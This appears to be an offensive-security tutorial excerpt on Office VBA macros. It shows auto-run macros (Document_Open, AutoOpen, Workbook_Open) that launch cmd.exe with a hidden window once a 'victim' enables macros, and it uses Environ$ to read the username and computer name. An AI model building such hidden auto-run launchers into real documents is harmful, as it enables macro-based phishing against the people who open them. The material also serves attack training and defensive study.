Technique to use VBA to launch an external application like cmd.exe. The first and simplest technique leverages the VBA Shell function, which takes two arguments. The first is the path and name of the application to launch along with any arguments. The second is the WindowStyle, which sets the program’s window style. As attackers, the vbHide value or its numerical equivalent (0) is the most interesting as it will hide the window of the program launched.
In the example below, as soon as the victim enables macros, we will launch a command prompt with a hidden window.
1
2
3
4
5
6
7
8
9
10
11
12
13
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "cmd.exe"
CreateObject("Wscript.Shell").Run str, 0
End Sub
ENVIRONMENT$ Variable usage
1
2
3
4
5
6
7
8
9
10
11
12
Sub PrintUserAndComputerName()
Dim i As Integer
Dim userName As String
Dim computerName As String
userName = Environ$("USERNAME")
computerName = Environ$("COMPUTERNAME")
For i = 1 To 5
Debug.Print "User: " & userName & " | Computer: " & computerName
Next i
End Sub
This is only shown on VBA Debugger, to See the Output:
- Press Alt + F11 to open the VBA Editor.
- Press Ctrl + G to open the Immediate Window.
- Run the macro again (F5).
Executing cmd.exe using Excel Sheet Macro
1
2
3
Private Sub Workbook_Open()
Shell "cmd.exe", vbNormalFocus
End Sub